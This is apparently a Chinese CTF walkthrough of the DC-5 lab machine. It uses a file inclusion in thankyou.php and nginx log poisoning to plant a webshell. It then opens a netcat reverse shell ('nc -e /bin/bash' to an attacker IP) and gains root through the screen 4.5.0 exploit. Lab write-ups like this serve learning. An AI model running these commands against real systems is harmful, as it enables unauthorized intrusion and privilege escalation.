还是老规矩,先搜集一波信息

arp-scan -l 检索一下我们的主机设备

192.168.75.138

使用nmap扫描端口信息 nmap -sS -p 1-65535 -A 192.168.75.138

发现启用了nginx服务,开启着80端口。访问试试

似乎是一个介绍页面,

还有一个留言板

发现存在index.php,solutions.php,about-us.php,faq.php,contact.php,thankyou.php,footer.php七个页面]
使用kali下的自带字典

因为我用的是Community版本的burp。。。。爆破没法设置线程巨慢,因此盗几张图

既然是文件包含,直接老规矩去读取/etc/passwd

thankyou.php?file=/etc/passwd

对方使用的是Nginx,那么能不能读取出nginx的日志文件呢。查询资料得出,默认nginx的日志路径是/var/log/nginx/*.log

如果说他将会读取日志。那么能否在日志里面插入一句话木马呢?

插入成功

上菜刀连接http://192.168.75.138/thankyou.php?file=/var/log/nginx/error.log试试看

成功

不出所料,又是一个低权用户

那么用nc反弹到kali里面玩

nc -e /bin/bash 192.168.75.129 1234

nc -lvvp 1234

然后我们寻找具有sudo权限的操作

find / -perm -u=s -type f 2>/dev/null

screen提权?

searchsploit screen 4.5.0

查找可用于screen 4.5.0的漏洞脚本文件

cp /usr/share/exploitdb/exploits/linux/local/41152.txt 41152.text

cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

将41154.sh中上面一部分c语言代码另存为libhax.c 编译libhax.c文件

gcc -fPIC -shared -ldl -o libhax.so libhax.c

将41154.sh中下面一部分c语言代码另存为rootshell.c 编译rootshell.c文件

gcc -o rootshell rootshell.c

将41154.sh中剩下部分代码另存为dc5.sh脚本文件
并在保存dc5.sh文件输入 :set ff=unix ,否则在执行脚本文件时后出错

为dc5.sh增加可执行权限,执行dc5.sh文件,成功获取到root权限
cd /tmp
chmod +x dc5.sh
ls -l
./dc5.sh


天渊应龙圣神大帝-道锋潜鳞

天渊应龙圣神大帝-道锋潜鳞

以凡人之躯,承载天之道义

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注